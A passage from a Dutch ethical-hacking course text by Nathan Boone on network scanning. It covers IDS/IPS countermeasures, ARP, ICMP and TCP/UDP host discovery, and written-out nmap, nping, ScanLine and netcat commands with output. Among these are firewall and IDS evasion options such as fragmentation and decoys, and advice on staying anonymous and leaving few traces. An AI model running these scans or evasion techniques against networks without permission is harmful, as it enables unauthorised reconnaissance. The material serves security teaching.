4.2.1 NIDS Een NIDS is een systeem dat zal detecteren of er iemand een scan probeert uit te voeren op uw netwerk. Een NIDS wordt geplaats op een monitoring poort, dit systeem zal dus passief uw netwerk monitoren en zal dus niet de mogelijkheid hebben om de scan te blokkeren. Een NIDS zal niet alleen effectief zijn tegen scans maar ook als iemand een worm of een virus probeert te verspreiden over uw netwerk. De NIDS zal alles wat hij tegenkomt loggen en in een databank steken. Als er zaken gebeuren waarvan de attentie van de netwerkbeheerder nodig is zal deze NIDS een alert doorsturen naar de netwerkbeheerder waarop de netwerkbeheerder kan reageren.
De volgende twee NIDS worden veel gebruikt, omdat ze goed en gratis zijn:
• Snort: dit systeem is te vinden via de volgende url: http://www.snort.org/.• Bro-IDS: dit systeem is te vinden via de volgende url: http://www.bro.org/.
4.2.2 IPS Een IPS is een systeem dat zal detecteren of er iemand een scan probeert uit te voeren op uw netwerk. Het verschil tussen een NIDS en een IPS is dat een IPS inline staat, dus dat het verkeer door hem moet gaan vooraleer het je netwerk bereikt. Hij doet dit door de persoon die de scan uitvoert te blokkeren. Hij kan dit enerzijds doen door al het verkeer van de bron tegen te houden en anderzijds door aanpassingen te doen in de firewall of aan de router. Wat een IPS ook kan doen is een patch doorvoeren waardoor gevoelige software aangepast wordt en zo niet meer gevoelig is voor aanvallen. Een IPS kan ook als er een e-mail binnenkomt met een geïnfecteerd bestand als bijlage (een virus of een worm). Dan kan hij deze bijlage van de e-mail verwijderen en dan de e-mail alsnog laten aankomen bij de bestemming.
De volgende IPS wordt veel gebruikt omdat hij goed en gratis is:
• Snort: dit systeem is te vinden via de volgende url: http://www.snort.org/.
4.2.3 Conclusie Het is goed om zowel een IPS als een IDS te hebben om je netwerk goed te kunnen beveiligen. Dit omdat ze elk op een andere plaats in het netwerk staan. Een IPS zal je meestal op de rand van je netwerk plaatsen om alles dat van buitenaf komt tegen te houden. Een IDS zal je meestal achter je firewall plaatsen zodat deze het interne verkeer kan analyseren, hierdoor zal je ook een goed zicht krijgen op het verkeer dat zich binnen de onderneming plaatsvindt.
5 Conclusie Aanvallers kunnen op vele verschillende manieren meer te weten komen over een bedrijf of een individu. Er zijn sommige aanvallen waar je weinig aan kunt doen en andere die je helemaal kan blokkeren. De IT-wereld verandert dagelijks, er zullen dus ook in de toekomst nog vele manieren
40
© Nathan Boone
bijkomen die aanvallers kunnen gebruiken om informatie over een individu of een bedrijf te weten te komen.
Het belangrijkste als aanvaller is dat je anoniem blijft, zodat de mensen waartegen je een aanval wilt doen niets op voorhand doorhebben.
41
© Nathan Boone
Pagina opzettelijk blanco gelaten
42
© Nathan Boone
Stap 2: Scanning 1 Algemene Inleiding In de vorige stap hebben we het gehad over hoe je een bedrijf in kaart moet brengen en hoe je verschillende gevoelige gegevens kan te weten komen over een bedrijf. In deze stap gaan we hierin verder, hier zullen we verschillende scans uitvoeren om zo het netwerk van het betreffende bedrijf in kaart te brengen. We zullen ook te weten kunnen komen hoe we door firewalls kunnen dringen en welke apparaten met welke versie in het netwerk actief zijn.
2 Host Discovery Ondertussen zijn we er al achter gekomen welke IP-ranges er gehanteerd worden in het bedrijf. Om echter exact te weten te komen achter welke IP-adressen apparaten actief zijn moeten we een scan van het netwerk uitvoeren. Dit wordt ook wel een ping-sweep of host-discovery genoemd.
Als je het woord “ping” hoort, denk je meteen aan ICMP, maar bij de term “ping-sweep” wordt er ook gebruik gemaakt van ARP, ICMP, TCP en UDP. Dit zijn verschillende manieren die zullen besproken worden in de volgende hoofdstukken.
3 ARP Host Discovery 3.1 MAC-ADRES Elk toestel dat verbonden is met het internet heeft een uniek nummer. Dit uniek nummer wordt een MAC-adres genoemd, dit adres wordt ook wel een hardware-adres genoemd.
Dit MAC-adres behoort tot de data-link laag van het OSI-model.
Dit MAC-adres is meestal opgeslagen in de read-only memory van de network interface card (NIC). Dit MAC-adres is toegewezen aan de NIC door de fabrikant.
Een voorbeeld van een MAC-adres is: 24-B6-FD-4E-6F-BF. Uit dit MAC-adres kan je afleiden dat het een toestel van Dell is. Dit kan je afleiden uit de eerste 6 hexadecimale cijfers. De betekenis van deze 6 hexadecimale cijfers kan je manueel opzoeken in: http://standards.ieee.org/develop/regauth/oui/oui.txt of een tool gebruiken zoals http://www.coffer.com/mac_find/.
Meer informatie over het MAC-adres: http://en.wikipedia.org/wiki/MAC_address.
43
© Nathan Boone
3.2 ARP-protocol Host-discovery kan je doen door het ARP protocol te gebruiken. Het ARP-protocol is een protocol dat MAC-adressen zal vertalen naar IP-adressen. Dit ARP-protocol maakt het mogelijk dat computers binnen hetzelfde netwerk met elkaar kunnen communiceren zonder hun MAC-adres te kennen.
ARP maakt gebruik van een broadcast. Hierdoor kan je ARP-scanning enkel gebruiken als je een scan wilt uitvoeren op hetzelfde broadcastdomein waarin jij aanwezig bent. Als jij iets wilt versturen naar een IP adres, bijvoorbeeld 192.168.1.2. Dan zal ARP het volgende doen:
Eerst zal ARP zoeken in zijn ARP-tabel naar het IP-adres. De ARP-tabel kan je vinden door het volgende commando in te typen in een Windows computer:
Commando:
C:\Users\nathan> arp –a Bekomen resultaat:
Interface: 192.168.1.8 --- 0x2 Internet Address Physical Address Type 192.168.1.1 7c-03-d8-c2-31-b8 dynamic 192.168.1.16 cc-08-e0-20-f8-74 dynamic 192.168.1.255 ff-ff-ff-ff-ff-ff static 255.255.255.255 ff-ff-ff-ff-ff-ff static In deze tabel staat het IP-adres met daarnaast het overeenkomstige MAC-adres.
Als het IP-adres nog niet in de tabel staat zal het ARP protocol het volgende doen:
Om te weten te komen welk MAC-adres achter het IP-adres 192.168.1.2 zit zal ARP een ARP Request Broadcast uitsturen. Dit bevat de volgende gegevens:
source MAC: 00:24:d7:c9:5f:f8, source IP: 192.168.1.3 destination MAC: ff:ff:ff:ff:ff:ff (broadcast), destination IP: 192.168.1.2
Elke computer die in het netwerk staat zal deze aanvraag ontvangen omdat het een broadcast is. Maar enkel de computer (NIC) waarvoor het bestemd is, zal antwoorden met een unicastpakket. Dit is een pakket dat enkel naar de doel MAC-adres gestuurd wordt. source MAC: 00:16:ce:29:81:22, source IP: 192.168.1.2 destination MAC: 00:24:d7:c9:5f:f8, destination IP: 192.168.1.3 Voor meer informatie over het ARP-protocol: http://en.wikipedia.org/wiki/Address_Resolution_Protocol
44
© Nathan Boone
3.3 ARP-netwerk scan Bij een ARP-netwerk scan zal je naar elke host binnen het netwerksegment een ARP request sturen. Van al de toestellen die een ARP reply terugsturen weet je of ze actief in het netwerk aanwezig zijn. Hierdoor ben je ook van elk toestel het MAC-adres te weten gekomen.
Een ARP-netwerk scan kan je met de volgende tools doen. Deze tools zullen in hoofdstuk 6 uitgebreid worden besproken:
UNIX/Linux:
• ARP-scan van NTA Monitor (www.nta-monitor.com/tools/arp-scan/ )
root@bt:~# ./arp-scan 192.168.1.0/24
• Network Mapper (Nmap) van Fyodor (www.nmap.org )
root@bt:~# nmap –sn –PR 192.168.1.0/24 Windows:
• Network Mapper (Nmap) van Fyodor (www.nmap.org )
nmap –sn –PR 192.168.1.0/24 • Cain van Oxid (www.oxid.it/cain.html)
sniffer > rechtermuisklik > scan MAC-adressen
45
© Nathan Boone
4 ICMP Host Discovery ICMP (Internet Control Message Protocol) ook wel een ping genoemd. Dit is een protocol dat gebruikt wordt om te identificeren of een toestel actief is op het netwerk. Het wordt door hackers gebruikt om waardevolle informatie over het netwerk te weten te komen, maar het is ook een protocol dat netwerkbeheerders gebruiken om problemen op het netwerk te troubleshooten. Hierdoor zijn er veel netwerken die het gebruik van het ICMP protocol uitgesloten hebben, en veel netwerken die dit wel toestaan. Je zal met deze vorm van host discovery niet altijd het verwachte resultaat bereiken.
Je kan verschillende soorten ICMP-berichten (pings) uitvoeren. Enkele veelgebruikte pings zijn:
Message Type 0 Echo Reply 3 Destination Unreachable 4 Source Quench 5 Redirect 8 Echo Request 11 Time Exceeded 12 Parameter Problem 13 Timestamp 14 Timestamp Reply 15 Information Request 16 Information Reply 17 Address Mask Request 18 Address Mask Reply Een traditionele ping is een ECHO REQUEST. Hierbij zal de verzender een ECHO REQUEST uitsturen en wachten tot hij een ECHO_REPLY terugkrijgt. Als hij een ECHO_REPLY terugkrijgt wilt het zeggen dat het toestel actief op het netwerk aanwezig is.
Commando:
ping 192.168.1.1 Resultaat:
Pinging 192.168.1.1 with 32 bytes of data: Reply from 192.168.1.1: bytes=32 time<1ms TTL=64 Reply from 192.168.1.1: bytes=32 time<1ms TTL=64 Reply from 192.168.1.1: bytes=32 time<1ms TTL=64 Reply from 192.168.1.1: bytes=32 time<1ms TTL=64 Ping statistics for 192.168.1.1: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms Voor meer informatie over het ICMP protocol: http://en.wikipedia.org/wiki/Internet_Control_Message_Protocol
46
© Nathan Boone
4.1 ICMP Host Discovery Tegenmaatregel Het is belangrijk om het ICMP protocol tegen te houden op het netwerk. Zo krijgt de hacker
het moeilijker om te weten te komen welke apparaten er aanstaan en bij welke ze kunnen proberen binnen te breken.
4.1.1 Gebruik van een Intrusion Detection System Er bestaan veel intrusion detection systemen die detecteren of er een ping sweep wordt uitgevoerd. Maar deze systemen beperken zich tot de detectie van zo een aanval. Dit zijn op zich wel goede tools maar zolang er geen persoon kijkt naar wat het intrusion detection systeem ontdekt, zullen de aanvallen zomaar kunnen doorgaan.
Windows: Snort (http://www.snort.org/)
UNIX/Linux:
• Scanlogd (http://openwall.com/scanlogd/) • Courtney (http://packetstormsecurity.com/UNIX/audit/courtney-1.3.tar.Z) • Ippl (http://pltplp.net/ippl/) • Protolog (http://packetstormsecurity.com/UNIX/loggers/protolog-1.0.8.tar.gz)
4.1.2 Preventie van ping sweeps Als je ICMP verkeer toelaat in je netwerk, kan er een DOS aanval plaatsvinden.
Het is ook mogelijk om andere data te verstoppen in een ICMP ECHO pakket. Het is dus aangeraden om het ICMP verkeer tegen te houden aan de rand van je netwerk. Je kan dit doen met een tool zoals loki2.
Voor meer informatie over het loki2: http://www.phrack.org/issues.html?issue=51&id=6.
Als je je netwerk wil beveiligen, kan je ervoor kiezen om maar enkel bepaalde types ICMP berichten toe te laten. Zoals besproken eerder in dit hoofdstuk kan je zien dat er vele verschillende ICMP berichten mogelijk zijn. Je kan ervoor kiezen om enkel die door te laten die je zelf nuttig vindt om te troubleshooten, zoals ICMP ECHO_REPLY, HOST_UNREACHABLE en TIME_EXCEEDED.
Het is nog veiliger als het ICMP verkeer door jouw ISP kan geblokkeerd worden, door gebruik te maken van acces control list (ACL). Hierdoor kan de ISP aan u een ping sturen om uw connectiviteit na te kijken en kunnen andere (buitenstaanders) dit niet doen.
47
© Nathan Boone
5 TCP / UDP Host Discovery Zoals uitgelegd in hoofdstuk 4 is gebruik maken van het ICMP protocol niet altijd de beste keuze. Gelukkig zijn er nog andere manieren om een netwerkscan uit te voeren. Als het netwerk het ICMP protocol niet toelaat kan je TCP of UDP host discovery toepassen.
Met TCP en UDP host discovery zal je proberen een connectie te maken met verschillende TCP- en UDP-poorten. Hieruit kan je dan afleiden of deze poorten open, gefilterd of gesloten zijn.
Bijvoorbeeld: een webserver zal gebruik maken van de service HTTP op poort 80 of HTTPS op poort 443. En een webserver is meestal verbonden met het extern netwerk zodat mensen van buiten het bedrijf ook de webpagina van het bedrijf kunnen raadplegen. Maar om veiligheidsredenen is het heel waarschijnlijk dat het ICMP protocol afgesloten is. In dit geval kan je dus een TCP poortscan doen van poort 80 of poort 443 op die webserver. Als je een antwoord krijgt op één van deze twee poorten, constateer je dat die server actief is op de betreffende poort.
Een nadeel van TCP en UDP host discovery is dat er zeer veel poorten zijn die kunnen gebruikt worden: van poort 1 tot poort 49151. Als je dus een TCP of UDP scan wilt uitvoeren kan je kiezen voor een paar poorten (de meest gebruikte) of al de mogelijke poorten. Het beste is, zo gericht mogelijk de scans uit te voeren om niet teveel argwaan te wekken. Als je al de poorten probeert te scannen heb je het meeste kans op succes, maar dan zal de verantwoordelijk van het netwerk waarin je de poortscan uitvoert ook weten dat er een poortscan plaatsgevonden heeft. En dan kan deze persoon maatregelen treffen.
Voor meer informatie over de verschillende mogelijke poorten: http://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers.
5.1 Poort scanning 5.1.1 Verschil tussen TCP en UDP In de volgende tabel wordt het TCP protocol vergeleken met het UDP protocol. Beide protocollen worden gebruikt voor verschillende functies in het netwerk.
Voorbeeld:
- TCP poort 23: Telnet - TCP poort 80: HTTP - UDP poort 53: DNS
48
© Nathan Boone
Uitleg TCP UDP Staat voor Transmission Control Protocol User Datagram Protocol of
Universal Datagram Protocol Connectie Connectie georiënteerd, stelt
eerst een connectie op voordat er gegevens kunnen worden verstuurd.
Connectieloos er zal niet eerste een connectie opgesteld worden.
Gebruik TCP zal veelal gebruikt worden door applicaties die zeker moeten zijn dat de verbinding behouden wordt. De snelheid is minder belangrijk.
UDP wordt veelal gebruikt door applicaties waarvoor het snel moet gaan.
Voorbeelden FTP, HTTP, HTTPS, SMTP, Telnet Live video streaming, VoIP, DNS
Snelheid van de overdracht Trager als UDP omdat er bij TCP aan foutcontrole gedaan wordt
Sneller als TCP omdat er bij UDP niet aan foutcontrole gedaan wordt.
Betrouwbaarheid Bij TCP is het belangrijk dat alle pakketten aankomen op hun bestemming. Als dit niet gebeurt, zullen ze opnieuw verzonden worden.
Bij UDP kan het zijn dat er enkele pakketten wegvallen. Aangezien de snelheid hier belangrijk is zullen ze niet opnieuw verstuurd worden.
Gewicht TCP is een protocol dat meer van het netwerk vraagt als UDP. TCP heeft eerst en vooral 3 pakketten nodig om een connectie op te zetten, voordat er data kan gestuurd worden.
UDP is een lichtgewicht protocol.
Foutcontrole TCP doet aan foutcontrole. UDP doet niet aan foutcontrole.
Velden in een pakket 1. Sequence Number 2. ACK Number 3. Data offset 4. Reserved 5. Control bit 6. Window 7. Urgent pointer 8. Options 9. Padding 10. Check Sum 11. Source port 12. Destination port
1. Length 2. Source port 3. Destination port 4. Check sum
Handshake Three-way-handshake • SYN • SYN-ACK • ACK
Geen handshake want het is een connectieloos protocol.
Tabel 5-1 Verschil tussen TCP en UDP
Bron: http://www.diffen.com/difference/TCP_vs_UDP
49
© Nathan Boone
Bij poortscanning zal je pakketten naar TCP en UDP poorten sturen, hier kan je van afleiden welke poorten aan het “luisteren” zijn. Op die manier kan je ook services achterhalen want achter elke poort zit een bepaalde service. Bovendien kan je ook te weten komen welke versie van het besturingssysteem en welke versie van service er gebruikt wordt.
Een poort die aan het “luisteren” is, is een weg naar binnen in het systeem.
Met een poortscan kan je het volgende in kaart brengen:
• De luisterende TCP- en UDP-services • Het type van besturingssysteem • De specifieke versies van een service
5.1.2 Programma’s waarmee je TCP en UDP scans kan uitvoeren Er zijn veel tools waarmee je poortscans kan uitvoeren. De tools die besproken zullen worden zijn, Nmap, ScanLine en Netcat.
5.1.2.1 Nmap Nmap doet aan intelligente poortscans. Dit wil zeggen dat ze eerst met een ping of een ARP-scan zal nagaan of de toestellen die je wil scannen, aangesloten zijn op het netwerk. Als dit het geval is, dan zal de poortscan beginnen.
5.1.2.2 ScanLine ScanLine is een tool die gebruikt wordt op Windows computers via het opdrachtprompt. Je kan hiermee scans uitvoeren. Dit is een tool dat niet hoeft geïnstalleerd worden op een systeem. Dit maakt het gemakkelijk om binnen te sluizen in een systeem dat vertrouwd is op een netwerk en hiermee dan scans uitvoeren.
5.1.2.3 Netcat Netcat is een “old school” tool dat voor veel verschillende doeleinden kan gebruikt worden. Aangezien Netcat over zoveel functionaliteiten beschikt wordt het ook wel “het Zwitsers zakmes” van hacking genoemd. Het is een tool die weinig sporen zal achterlaten als deze een poortscan uitvoert. Je kan deze tool dus het best gebruiken als je zo weinig mogelijk sporen wilt achterlaten op een systeem.
50
© Nathan Boone
6 Netwerk verkenning tools 6.1 Nmap Nmap is een zeer krachtige tool als het gaat over het scannen van een netwerk. Nmap heeft zeer veel opties die je kan aan en uitzetten. Dit zijn er teveel om hier te bespreken, ik zal enkel de belangrijkste bespreken.
6.1.1 ICMP In dit hoofdstuk zullen de variabelen besproken worden die met Nmap meegestuurd kunnen worden om verschillende ICMP scans uit te voeren.
nmap –sn 192.168.1.1 Als non root user:
• TCP ping van poort 80 en poort 443 zoals beschreven in 3.5
Als root user:
• Geen poort scan • Stuurt een ICMP ECHO REQUEST • ARP scan zoals beschreven in 3.3 • TCP ping van poort 80 en poort 443 zoals beschreven in 3.5
nmap –PE 192.168.1.1 Stuurt een ICMP ECHO REQUEST
6.1.2 TCP/UDP poort scanning In dit hoofdstuk zullen de variabelen besproken worden die met Nmap meegestuurd kunnen worden om verschillende poortscans uit te voeren. Zie hoofdstuk 5.1.3 voor meer informatie over poortscans met Nmap.
Er zijn verschillende scan types die je kan uitvoeren. We zullen deze scans uitvoeren met de tool Nmap. Je kan hiermee de volgende poortscans uitvoeren:
6.1.2.1 Verschillende types poortscan Negeer Host Discovery (-Pn)
• Negeer de Host Discovery, moest je dit niet doen dan zou je scan eerst een ICMP host discovery doen en dan enkel een poortscan doen bij de apparaten die actief zijn. Onze bedoeling is net de hosts die niet te vinden zijn met een host discovery te vinden.
• Commando: nmap –Pn 192.168.1.1
TCP Connect scan (-sT):
• Een volledige three-way handshake (SYN, SYN/ACK, ACK) • Duurt langer dan andere scans • Heeft meer kans om gelogd te worden door het gescande systeem • Heeft geen administrator privileges nodig om deze scan uit te voeren • Commando: nmap –sT 192.168.1.1
51
© Nathan Boone
TCP SYN scan (-sS):
• Een halve three-way handshake (SYN, SYN/ACK) • Er wordt een SYN pakket verstuurd:
o als er een SYN/ACK terugkomt, weet je dat de poort aan het luisteren is o als er een SYN/RST terugkomt, weet je dat de poort niet aan het luisteren is
• Heeft minder kans om gelogd te worden door het gescande systeem • Kan gezien worden als een DOS aanval, omdat veel half open connecties gestart worden • Commando: nmap –sS 192.168.1.1
TCP FIN scan (-sF):
• Er wordt een FIN pakket gestuurd • Er komt een RST pakket terug van al de gesloten poorten • Deze techniek werkt meestal op UNIX gebaseerde systemen • Commando: nmap –sF 192.168.1.1
TCP Xmas Tree scan (-sX):
• Er wordt een FIN, URG en PUSH pakket gestuurd • Er komt een RST pakket terug van al de gesloten poorten • Commando: nmap –sX 192.168.1.1
TCP Null scan (-sN):
• Er wordt een een serie van pakketten gestuurd o met een sequence number van 0 o zonder flags
• Omdat er geen flags aanwezig zijn kan het zijn dat deze scan door een firewall kan gaan omdat deze firewall zal controleren op de flags
• Er komt een RST pakket terug van al de gesloten poorten • Commando: nmap –sN 192.168.1.1 • Bron: http://www.plixer.com/blog/scrutinizer/the-null-scan-you%E2%80%99re-being-
watched/
TCP ACK scan (-sA):
• Er wordt een ACK pakket gestuurd • Het kan je helpen om na te gaan of de firewall een simpele pakket filter is die alleen ACK
pakketten doorlaat, omdat hij denkt dat er al een deel van de “three way handshake” voltooid is.
• Het kan je helpen nagaan of het gaat om een statefull firewall die aan advanced pakket filtering doet
• Commando: nmap –sA 192.168.1.1
52
© Nathan Boone
TCP Windows scan (-sW):
• Er wordt een ACK pakket gestuurd • Het wordt meestal niet gelogd door het systeem • Er worden geen sessies geopend, dus er is niet veel netwerkverkeer • Omdat er enkel een ACK gestuurd wordt is er een mogelijkheid dat deze scan door de firewall
zal gaan • Er zal een RST pakket terugkomen van elke poort ook als deze toe is. Aan deze RST pakketten
zal een “window size” bijkomen: o “Window size 0”: wil zeggen dat de poort toe is o “Window size > 0”: wil zeggen dat de poort open is
• Heeft administrator privileges nodig op het systeem vanwaar je je scan uitvoert • Commando: nmap –sW 192.168.1.1 • Bron: http://www.networkuptime.com/nmap/page3-13.shtml
TCP RPC scan (-sR of -sV):
• Er wordt een Remote Procedure Call (RPC) Null pakket gestuurd • Met deze scan kan je nagaan op welke computers RPC applicaties staan met hun
versienummer. • Commando: nmap –sR 192.168.1.1 • Commando: nmap –sV 192.168.1.1 • Bron: http://www.networkuptime.com/nmap/page3-14.shtml
UDP scan (-sU):
• Dit is een trage scan, de resultaten zijn dan ook niet altijd even betrouwbaar • Er wordt een UDP pakket gestuurd:
o als er een “ICMP port unreachable” terugkomt dan is de poort gesloten (type 3 code 3)
o als er een “ICMP port unreachable” terugkomt dan is de poort gefilterd (type 3 code 1, 2, 9, 10 of 13)
o als er niets terugkomt, dan is de poort open of gefilterd • Commando: nmap –sU 192.168.1.1 • Bron: http://nmap.org/book/man-port-scanning-techniques.html
53
© Nathan Boone
6.1.2.2 Uitbreiding: mogelijkheden van Nmap Bij de volgende poortscan heb ik gebruik gemaakt van het TCP SYN type poortscan, je kan dit type poortscan vervangen door het type die je wil gebruiken. Bovendien kan je bij de IP-adressen ook altijd een subnet masker toevoegen. Dit subnet masker moet dan wel aan het IP-adres kleven.
TCP SYN Scan op een specifieke poort (-sS –p 22 –open)
• Een poortscan maar enkel op poort 22 omdat deze poort vaak gebruikt wordt. Deze poort is SSH, enkele andere veel voorkomende poorten zijn: SMTP (25), POP (110), AUTH (113), IMAP (143)
• Commando: nmap -sS -p 22 –open 192.168.1.1
TCP SYN Scan gefragmenteerd (-f)
• Door “-f” te gebruiken zal de TCP header gefragmenteerd worden over verschillende pakketten. Hierdoor wordt het moeilijker voor de firewall of IDS systeem om deze scan te onderscheppen.
• Commando: nmap –sS –f 192.168.1.1
TCP SYN Scan met een afleidingsmanoeuvre (-D)
• Door “-D” te gebruiken zullen er nog andere scans gebeuren van een ander IP-adres, dit om het systeem af te leiden van de echte scan.
• Als tweede IP-adres geef je het best een IP-adres van een legitieme server op, die zich bevindt op hetzelfde netwerk, waarvan hij wel scans aanvaardt.
• Commando: nmap –sS 192.168.1.1 –D 192.168.1.2
TCP SYN Scan, output in document plaatsen (-oN outfile.txt)
• Als de scan afgelopen is zal Nmap een bestand aanmaken waarin hij zal wegschrijven, exact wat er op het scherm verschijnt
• Het bestand heet outfile.txt • Commando: nmap –sS 192.168.1.1 -oN outfile.txt
TCP SYN Scan, output in een tab-gelimiteerd bestand (-oG outfileTAB.txt)
• Resultaat van je scan in een tab-gelimiteerd file steken • Het bestand heet outfileTAB.txt • Commando: nmap –sS 192.168.1.1 -oG outfileTAB.txt
TCP SYN Scan, output in een bestand met XML formaat(-oX outfileXML.txt)
• Resultaat van je scan in XML formaat opslaan • Het bestand heet outfileXML.txt • Commando: nmap –sS 192.168.1.1 -oX outfileXML.txt
TCP SYN Scan, output in gewoon-, tab-gelimiteerd- en XML- formaat (-oA outfile.txt)
• Resultaat van je scan in zowel, normaal, tab-gelimiteerd en XML formaat opslaan. In dit geval zijn er vier bestanden aangemaakt.
• Deze bestanden heten: o outfile.txt.nmap, in normaal formaat
54
© Nathan Boone
o outfile.txt.gnmap, in tab-gelimiteerd formaat o outfile.txt.xml, in XML formaat
• Commando: nmap –sS 192.168.1.1 -oA outfile.txt
6.2 Hping3 en Nping Hping3 is een tool die kan gebruikt worden voor zeer veel uiteenlopende doeleinden. Vermits we ICMP scan en TCP/UDP poortscans besproken hebben, zal hij in dit geval gebruikt worden om poorten te scannen en om host discovery toe te passen. Het nadeel aan Hping3 is dat het niet meer onderhouden wordt. De laatste keer dat er updates zijn toegepast dateren van 2005. Aangezien dit toch een zeer goede tool is, hebben Luis Martin Garcia en Fyodor beslist om zijn functionaliteit toe voegen aan een tool dat bij Nmap hoort. Deze tool heet Nping. Nping is dus een geüpdatet versie van Hping3.
6.2.1 ICMP scan In het volgend voorbeeld zal Nping gebruikt worden om twee ICMP berichten te sturen van het type timestamp.
Commando: Sudo nping -c 2 --icmp --icmp-type time 192.168.1.1
Resultaat:
root@bt:~# nping -c 2 --icmp --icmp-type time 192.168.1.1 Starting Nping 0.6.25 ( http://nmap.org/nping ) at 2013-12-23 11:11 CET SENT (0.0053s) ICMP 192.168.1.18 > 192.168.1.1 Timestamp request (type=13/code=0) ttl=64 id=60735 iplen=40 RCVD (0.0061s) ICMP 192.168.1.1 > 192.168.1.18 Timestamp reply (type=14/code=0) ttl=64 id=64725 iplen=40 SENT (1.0063s) ICMP 192.168.1.18 > 192.168.1.1 Timestamp request (type=13/code=0) ttl=64 id=60735 iplen=40 RCVD (1.0072s) ICMP 192.168.1.1 > 192.168.1.18 Timestamp reply (type=14/code=0) ttl=64 id=64726 iplen=40 Max rtt: 0.750ms | Min rtt: 0.727ms | Avg rtt: 0.738ms Raw packets sent: 2 (80B) | Rcvd: 2 (92B) | Lost: 0 (0.00%) Tx time: 1.00237s | Tx bytes/s: 79.81 | Tx pkts/s: 2.00 Rx time: 1.00305s | Rx bytes/s: 91.72 | Rx pkts/s: 1.99 Nping done: 1 IP address pinged in 1.01 seconds
55
© Nathan Boone
6.2.2 TCP/UDP port scanning Met Nping kan je een poortscan uitvoeren zoals beschreven in 3.5. aangezien Nping een brede tool is zal je ook meer zien in de output. Je kan dit doen met het volgende commando:
Sudo nping –c 2 –tcp –p 22 –-flags syn 192.168.1.23 Met dit commando zal je 2 requests sturen op TCP poort 22. Je zal dan ook vragen om de pakketten te taggen met S of SA.
Bekomen resultaat:
root@bt:~# nping -c 2 -tcp -p 22 --flags syn 192.168.1.1 Starting Nping 0.6.25 ( http://nmap.org/nping ) at 2013-12-23 11:10 CET SENT (0.0352s) TCP 192.168.1.18:52417 > 192.168.1.1:22 S ttl=64 id=25621 iplen=40 seq=1440928595 win=1480 RCVD (0.0375s) TCP 192.168.1.1:22 > 192.168.1.18:52417 RA ttl=64 id=14225 iplen=40 seq=0 win=0 SENT (1.0357s) TCP 192.168.1.18:52417 > 192.168.1.1:22 S ttl=64 id=25621 iplen=40 seq=1440928595 win=1480 RCVD (1.0366s) TCP 192.168.1.1:22 > 192.168.1.18:52417 RA ttl=64 id=14226 iplen=40 seq=0 win=0 Max rtt: 2.222ms | Min rtt: 0.729ms | Avg rtt: 1.475ms Raw packets sent: 2 (80B) | Rcvd: 2 (92B) | Lost: 0 (0.00%) Tx time: 1.00180s | Tx bytes/s: 79.86 | Tx pkts/s: 2.00 Rx time: 1.00251s | Rx bytes/s: 91.77 | Rx pkts/s: 1.99 Nping done: 1 IP address pinged in 1.04 seconds
Nping bevat ook nog andere functionaliteiten zoals:
• Spoofing source MAC-adres • Spoofing source IP adres • Vele zaken die je kan gebruiken om je identiteit in een netwerk te verstoppen
56
© Nathan Boone
6.3 ScanLine Scanline is een kleine CLI tool die gebruikt wordt op Windows computers. Hierdoor is het gemakkelijk om binnen te sluizen in een geïnfecteerd systeem. Je kan er scans mee uitvoeren zonder dat het op het systeem geïnstalleerd is.
Met dit commando zal je een scan doen van de TCP poorten 21,22,23,25 en 8080. Door “–p” te gebruiken zal je geen ping doen op voorhand, omdat je al weet dat dit toestel actief is in je netwerk.
Commando: sl -t 21,22,23,25,8080 -p 192.168.1.1
Resultaat:
ScanLine (TM) 1.01 Copyright (c) Foundstone, Inc. 2002 http://www.foundstone.com Scan of 1 IP started at Mon Dec 23 17:25:22 2013 -------------------------------------------------------------------- 192.168.1.1 Responds with ICMP unreachable: No TCP ports: 23 8080 -------------------------------------------------------------------- Scan finished at Mon Dec 23 17:25:26 2013 1 IP and 5 ports scanned in 0 hours 0 mins 4.03 secs Gedownload van: http://www.mcafee.com/us/downloads/free-tools/scanline.aspx
6.4 netcat Netcat is een CLI tool die al heel lang bestaat. Dit is een tool die vooral nuttig is als je de zaken die je achterlaat (de footprint) wilt beperken. Deze tool heeft zeer veel functionaliteiten, de functionaliteit die hier zal besproken worden is de TCP en UDP poortscan functionaliteit.
6.4.1 TCP poortscan Met dit commando zal je een poortscan doen van de poorten 1 tot 100. Met “-v” laat je weten dat je het moeten laten zien op je scherm, met “-z” laat je weten dat hij een poortscan moet uitvoeren. En “-w2” is de time-out die je instelt per connectie.
Commando: nc -v -z -w2 192.168.1.1 1-100
Resultaat:
(UNKNOWN) [192.168.1.1] 80 (http) open (UNKNOWN) [192.168.1.1] 23 (telnet) open
57
© Nathan Boone
6.4.2 UDP poortscan Met dit commando zal je een poortscan doen van de UDP poorten 53, 67 en 68. Aangezien netcat standaard een TCP poortscan uitvoert moet je “-u” toevoegen om te laten weten dat je een UDP poortscan wil uitvoeren. Met “-v” laat je weten dat je het moet laten zien op je scherm, met “-z” laat je weten dat hij een poortscan moet uitvoeren. En “-w2” is de time-out voor elke connectie.
Commando: nc -u -v -z -w2 192.168.1.1 53 67 68
Resultaat:
(UNKNOWN) [192.168.1.1] 53 (domain) open (UNKNOWN) [192.168.1.1] 67 (bootps) open (UNKNOWN) [192.168.1.1] 68 (bootpc) open Netcat is te downloaden van: http://joncraton.org/blog/46/netcat-for-windows
6.5 SuperScan Dit is een GUI waarmee je netwerk scans kan uitvoeren. Je kan hier heel veel zaken aan- en uit-zetten. De scans waartoe ik me beperkt heb zijn ICMP ping sweeps. Ik heb dit gedaan met SuperScan 4.1 en met SuperScan 3.0. Ik ben wisselende resultaten tegengekomen. Je kan de verkregen informatie van de scan zien als een HTML bestand, wat het overzichtelijk maakt.
Met SuperScan kan je ook een UDP en TCP host discovery doen. Je moet dan de checkbox voor ICMP uitzetten.
De tools zijn enkel ontwikkeld voor Windows en zijn te downloaden van:
SuperScan 3.0: http://www.mcafee.com/us/downloads/free-tools/superscan3.aspx
SuperScan 4.1: http://www.mcafee.com/us/downloads/free-tools/superscan.aspx
Zoals u kan zien, zijn er twee versies van deze software. Ik heb ze beide uitgeprobeerd en SuperScan 4.1 werkte niet zoals verwacht. Hij liet steeds zien dat er maar 1 host gevonden is. Zoals u kan zien in de foto hieronder:
Afbeelding 6-1 Superscan 4.1
58
© Nathan Boone
SuperScan3 werkt wel naar behoren. De scan met SuperScan3 leverde het volgende resultaat op:
Afbeelding 6-2 Superscan 3.0
